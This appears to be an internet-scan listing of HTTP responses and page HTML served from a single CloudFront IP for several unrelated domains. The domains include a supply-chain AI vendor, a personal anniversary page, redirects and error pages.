<!doctype html><html lang="en"><head><meta charset="utf-8"/><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="expires" content="0"><meta http-equiv="pragma" content="no-cache"><link rel="shortcut icon" href="/favicon.ico"/><link href="https://use.fontawesome.com/releases/v5.0.1/css/all.css" rel="stylesheet"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"/><meta name="theme-color" content="#000000"/><meta name="description" content="Generate free floorplans for a house fast and easily in 3D & 2D on any device."/><link rel="manifest" href="/manifest.json"/><link href="https://fonts.googleapis.com/css?family=Montserrat:400,700,200" rel="stylesheet"/><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous"><title>MasterSuite</title><script data-ad-client="ca-pub-1272955356336444" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><link href="/static/css/2.790a2e7e.chunk.css" rel="stylesheet"><link href="/static/css/main.d75480aa.chunk.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"></div><script>!function(e){function r(r){for(var n,l,a=r[0],i=r[1],p=r[2],c=0,s=[];c<a.length;c++)l=a[c],Object.prototype.hasOwnProperty.call(o,l)&&o[l]&&s.push(o[l][0]),o[l]=0;for(n in i)Object.prototype.hasOwnProperty.call(i,n)&&(e[n]=i[n]);for(f&&f(r);s.length;)s.shift()();return u.push.apply(u,p||[]),t()}function t(){for(var e,r=0;r<u.length;r++){for(var t=u[r],n=!0,a=1;a<t.length;a++){var i=t[a];0!==o[i]&&(n=!1)}n&&(u.splice(r--,1),e=l(l.s=t[0]))}return e}var n={},o={1:0},u=[];function l(r){if(n[r])return n[r].exports;var t=n[r]={i:r,l:!1,exports:{}};return e[r].call(t.exports,t,t.exports,l),t.l=!0,t.exports}l.m=e,l.c=n,l.d=function(e,r,t){l.o(e,r)||Object.defineProperty(e,r,{enumerable:!0,get:t})},l.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},l.t=function(e,r){if(1&r&&(e=l(e)),8&r)return e;if(4&r&&"object"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(l.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&r&&"string"!=typeof e)for(var n in e)l.d(t,n,function(r){return e[r]}.bind(null,n));return t},l.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return l.d(r,"a",r),r},l.o=function(e,r){return Object.prototype.hasOwnProperty.call(e,r)},l.p="/";var a=this["webpackJsonpreact-three-boilerplate"]=this["webpackJsonpreact-three-boilerplate"]||[],i=a.push.bind(a);a.push=r,a=a.slice();for(var p=0;p<a.length;p++)r(a[p]);var f=i;t()}([])</script><script src="/static/js/2.d9ee60b8.chunk.js"></script><script src="/static/js/main.05247e34.chunk.js"></script></body></html>
Open service 13.32.99.35:443 · plantryx.com
2026-01-02 03:42
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 15550
Connection: close
Date: Fri, 02 Jan 2026 03:42:47 GMT
Last-Modified: Tue, 02 Dec 2025 06:28:23 GMT
ETag: "16f13bad41987047761c6b9cb4ff53b3"
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 987865b81ba895db5b3f56f8ae175c84.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: B3Aw-TDSGvS-PTlzN_I8ft185uziGKNov0MQ_6TzyF73KkrxMkcRNg==
Page title: Supply Chain AI Solutions By Plantryx
<!DOCTYPE html>
<html lang="en">
<head>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-WP86JFDT');</script>
<!-- End Google Tag Manager -->
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="index, follow">
<link rel="canonical" href="https://plantryx.com/index.html">
<title>Supply Chain AI Solutions By Plantryx</title>
<link rel="shortcut icon" href="assets/imgs/logos/plantryx-icon.svg" type="image/x-icon">
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-NGGSZTNBQD"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-NGGSZTNBQD');
</script>
<!-- Bootstrap CSS -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- Bootstrap Icons -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.0/font/bootstrap-icons.css" rel="stylesheet">
<!-- Custom CSS -->
<link rel="stylesheet" href="assets/css/main.css">
</head>
<body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WP86JFDT"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<!-- Navigation -->
<nav class="navbar navbar-expand-lg navbar-dark fixed-top">
<div class="container">
<a class="navbar-brand" href="index.html">
<img src="assets/imgs/logos/logo.svg" alt="Plantryx" height="40">
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarNav">
<ul class="navbar-nav ms-auto">
<li class="nav-item">
<a class="nav-link active" href="index.html">Home</a>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" role="button" data-bs-toggle="dropdown">
Platform & Solutions
</a>
<ul class="dropdown-menu">
<li><a class="dropdown-item" href="solutions/demand-planning.html">Demand Planning</a></li>
<li><a class="dropdown-item" href="solutions/supply-planning.html">Supply Planning</a></li>
<li><a class="dropdown-item" href="solutions/end-to-end-planning.html">End-to-End Planning</a></li>
<li><a class="dropdown-item" href="solutions/platform-capabilities.html">Platform Capabilities</a></li>
<li><a class="dropdown-item" href="solutions/integrations.html">Integrations</a></li>
</ul>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" role="button" data-bs-toggle="dropdown">
Who We Help
</a>
<ul class="dropdown-menu">
<li><a class="dropdown-item" href="industries/mobility-auto.html">Mobility & Auto</a></li>
<li><a class="dropdown-item" href="industries/consumer-goods.html">Consumer Goods</a></li>
<li><a class="dropdown-item" href="industries/energy-commodities.html">Energy & Commodities</a></li>
<li><a class="dropdown-item" href="industries/high-tech.html">High Tech</a></li>
<li><a class="dropdown-item" href="industries/industrial-manufacturing.html">Industrial Manufacturing</a>
</li>
<li><a class="dropdown-item" href="industries/healthcare-life-sciences.html">Healthcare & Life
Open service 13.32.99.35:443 · kingwild.vip
2026-01-01 23:48
HTTP/1.1 403 Forbidden Server: CloudFront Date: Thu, 01 Jan 2026 23:48:30 GMT Content-Type: text/html Content-Length: 986 Connection: close X-Cache: Error from cloudfront Via: 1.1 372875ad1ec20daf24f3f29f14a73cd0.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: TCMx_JJG3JJr5rl028rHa2XXdrYl6l4MR_05LW8uQHdfJStWKzKhzw== Page title: ERROR: The request could not be satisfied <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ERROR: The request could not be satisfied</TITLE> </HEAD><BODY> <H1>403 ERROR</H1> <H2>The request could not be satisfied.</H2> <HR noshade size="1px"> The Amazon CloudFront distribution is configured to block access from your country. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner. <BR clear="all"> If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation. <BR clear="all"> <HR noshade size="1px"> <PRE> Generated by cloudfront (CloudFront) Request ID: TCMx_JJG3JJr5rl028rHa2XXdrYl6l4MR_05LW8uQHdfJStWKzKhzw== </PRE> <ADDRESS> </ADDRESS> </BODY></HTML>
Open service 13.32.99.35:443 · www.jazyemilio.com
2026-01-01 21:17
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Thu, 01 Jan 2026 21:17:34 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 ca8cb14c76df16342491237cea8cfed6.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: TKmQ6kNiXVmdB2ryXpTvwFSWJwXEp81rE4hMEBb683kD7JpUyKLiJw==
Age: 1
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:443 · www.jazyemilio.com
2025-12-31 21:34
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Tue, 30 Dec 2025 12:40:30 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 7fd88bab22735486702d23ba4e028d86.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: X6Y59tf4R8akwhBJrCH1sdl0Q4LZEXh2RojnZuLjupX4miK5Hv5GNA==
Age: 118442
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:443 · websolarch.com
2025-12-31 20:09
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Connection: close Date: Wed, 31 Dec 2025 20:09:41 GMT Location: https://www.websolarch.com/ X-Cache: Miss from cloudfront Via: 1.1 7fd88bab22735486702d23ba4e028d86.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: EsgRPmsemnbnOA07p4SodqNxu2dT36hCdFXoHI_K9pqYbhoR03sOcw==
Open service 13.32.99.35:80 · websolarch.com
2025-12-31 20:09
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Wed, 31 Dec 2025 20:09:40 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://websolarch.com/ X-Cache: Redirect from cloudfront Via: 1.1 c43915e0cad14ee7685e5f74a99ce93c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: pQ_RwOjZgHo8Iijex3OjkjiNsGGz-aNX0Fld6-97wIBDxYZOy7IPlQ== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · www.jazyemilio.com
2025-12-30 21:23
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Tue, 30 Dec 2025 21:23:04 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 8b889e35789d2b97f2ba8771acc9a008.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: kd0gHl8KTR1O2QaFsofaumfq9tvBmPqjLDYNYAmkia-TPHTemDnf6w==
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:443 · n.fplr.co
2025-12-30 14:51
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 241
Connection: close
Date: Sat, 13 Dec 2025 01:24:11 GMT
Cache-Control: public, max-age=31560000
Last-Modified: Mon, 06 Mar 2023 06:10:03 GMT
Etag: "8117852eb62459b0b3698e8f25b810fb"
Server: AmazonS3
Via: 1.1 efb4ddf9650598b987ef5db782c5b530.cloudfront.net (CloudFront)
Age: 1517253
X-Cache: Hit from cloudfront
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: UOUZ5WkDGeXLKcF3dg-6MRe0Ya0uBL69iw5zpkZ3Rd9nKWyd7ng1yQ==
<!DOCTYPE html>
<html>
<head></head>
<body>
<style>
[v-cloak] {
display: none;
}
</style>
<div id="app" v-cloak></div>
<div id="debug" v-cloak></div>
<script src="./popup.js"></script>
</body>
</html>
Open service 13.32.99.35:443 · sf.richter-rw.de
2025-12-30 14:36
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Tue, 30 Dec 2025 14:36:18 GMT Server: Apache Link: <https://www.richter-rw.de/wp-json/>; rel="https://api.w.org/", <https://www.richter-rw.de/wp-json/wp/v2/pages/930>; rel="alternate"; title="JSON"; type="application/json", <https://www.richter-rw.de/>; rel=shortlink, <https://sf.richter-rw.de/wp-content/cache/minify/818c0.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/85615.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/3ceb8.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/1f540.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/c0b5c.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/49194.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/e6deb.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/18003.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/6178e.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/078d1.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/a8453.css>; rel=preload; as=style, <https://sf.richter-rw.de/wp-content/cache/minify/d8d42.css>; rel=preload; as=style, <https://sf.richter-rw.de/wp-content/cache/minify/fc0e8.css>; rel=preload; as=style Expires: Tue, 30 Dec 2025 15:27:30 GMT Pragma: public Cache-Control: max-age=3071, public Cache-Control: max-age=0, no-cache, s-maxage=10 X-Powered-By: W3 Total Cache/2.8.14 Referrer-Policy: X-Mod-Pagespeed: 1.14.36.1-0 Access-Control-Allow-Origin: * Vary: Accept-Encoding X-Cache: Miss from cloudfront Via: 1.1 b4904c5988fd0eaae341a12cc47f3766.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: gBFmH2q1hrhBIX8cRT7PU-UxalZh7c_FUiSq8VFKHwQjirtGaT1bDw==
Open service 13.32.99.35:80 · mewell.it
2025-12-30 11:17
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Tue, 30 Dec 2025 11:17:45 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://mewell.it/ X-Cache: Redirect from cloudfront Via: 1.1 3296b04068551f925d5fafd1b785ff30.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: yctaYefzRvf4-1yh3sa5mGgaxq9viY-ahfzt2ccus3BrqKK90lINBQ== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · mewell.it
2025-12-30 11:17
HTTP/1.1 301 Redirecting Server: CloudFront Date: Tue, 30 Dec 2025 11:17:40 GMT Content-Length: 0 Connection: close Location: https://www.mewell.it/ X-Cache: FunctionGeneratedResponse from cloudfront Via: 1.1 79272ab9b399ee696b329d4f677dca48.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: YjCwn5d_rR_Qac4WcogxpG0SGOlV-PfwX76zAnNTRLurBJK9l6SdsQ==
Open service 13.32.99.35:443 · plantryx.com
2025-12-30 11:04
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 15550
Connection: close
Date: Tue, 30 Dec 2025 11:04:44 GMT
Last-Modified: Tue, 02 Dec 2025 06:28:23 GMT
ETag: "16f13bad41987047761c6b9cb4ff53b3"
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 68b2682a924ac399aa2724b5b439e75c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: GInI-RvfDmDW7MK3IddflLRp6QyvCrC9Xl9DdjeDba6sbDTcVPiBrg==
Page title: Supply Chain AI Solutions By Plantryx
<!DOCTYPE html>
<html lang="en">
<head>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-WP86JFDT');</script>
<!-- End Google Tag Manager -->
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="index, follow">
<link rel="canonical" href="https://plantryx.com/index.html">
<title>Supply Chain AI Solutions By Plantryx</title>
<link rel="shortcut icon" href="assets/imgs/logos/plantryx-icon.svg" type="image/x-icon">
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-NGGSZTNBQD"></script>
<script>
